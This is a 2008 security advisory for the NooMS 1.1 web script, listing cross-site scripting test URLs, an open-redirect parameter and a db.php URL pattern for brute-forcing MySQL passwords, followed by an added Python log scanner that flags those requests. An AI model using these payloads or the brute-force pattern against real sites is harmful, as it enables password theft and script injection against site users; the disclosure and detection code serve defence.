NooMS Cross-Site Scripting Vulnerability :: 2008-09-16
----------------------------------------------------------------
Script : Nooms 1.1
Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access)
Risk : Medium
----------------------------------------------------------------
Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Mysql Remote Brute Force Vulnerability :
This is a new type of vulnerability. I can't publish an exploit for this vulnerability, but with this vulnerability an attacker can brute force the root and other user passwords with PHP in remote mode.
Mysql Brute Force Vulnerability :
/db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password]
----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script>
Xss 2 : http://Example/search.php?q="<script>alert('xss')</script>
----------------------------------------------------------------
Redirect Vulnerability :
Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
HTTP://FEREIDANI.IR
----------------------------------------------------------------
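
Detection example (added here, not part of the original advisory or of the NooMS project): a scan of web server access logs for the request patterns listed above. It assumes combined-format access logs; the log lines, IP addresses and the threshold of 3 are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Script path -> query parameters named in the advisory.
ADVISORY_PARAMS = {
    "/db.php": {"g_dbhost", "g_dbuser", "g_dbpwd"},
    "/admin/auth.php": {"g_site_url"},
    "/smileys.php": {"page_id"},
    "/search.php": {"q"},
}
MARKUP = re.compile(r'[<>"]')  # characters the advisory's XSS test strings use
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (client, finding) if the request matches an advisory pattern, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    for suffix, names in ADVISORY_PARAMS.items():
        hit = names & params.keys()
        if not url.path.endswith(suffix) or not hit:
            continue
        if suffix == "/db.php":  # database settings should never arrive in a URL
            return client, "db-credential-params"
        if suffix == "/admin/auth.php":
            return client, "g_site_url-override"
        if any(MARKUP.search(v) for n in hit for v in params[n]):
            return client, "markup-in-" + sorted(hit)[0]
    return None

def scan(lines, brute_threshold=3):
    """Return all findings plus clients that hit db.php at least brute_threshold times."""
    findings = [r for r in map(classify, lines) if r]
    db_hits = Counter(c for c, kind in findings if kind == "db-credential-params")
    return findings, sorted(c for c, n in db_hits.items() if n >= brute_threshold)

TS = "[16/Sep/2008:10:00:00 +0000]"  # constructed timestamp
SAMPLE_LOG = [  # constructed log lines using documentation IP ranges
    f'203.0.113.7 - - {TS} "GET /db.php?g_dbhost=localhost&g_dbuser=root&g_dbpwd=a HTTP/1.1" 200 12',
    f'203.0.113.7 - - {TS} "GET /db.php?g_dbhost=localhost&g_dbuser=root&g_dbpwd=b HTTP/1.1" 200 12',
    f'203.0.113.7 - - {TS} "GET /db.php?g_dbhost=localhost&g_dbuser=root&g_dbpwd=c HTTP/1.1" 200 12',
    f'198.51.100.4 - - {TS} "GET /smileys.php?page_id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 340',
    f'198.51.100.4 - - {TS} "GET /search.php?q=forum+rules HTTP/1.1" 200 900',
    f'192.0.2.9 - - {TS} "GET /admin/auth.php?g_site_url=http://other.example/ HTTP/1.1" 302 0',
]
```

Calling scan(SAMPLE_LOG) returns the list of findings and the clients whose db.php request count reached the threshold; an ordinary search request such as the fifth sample line is not flagged.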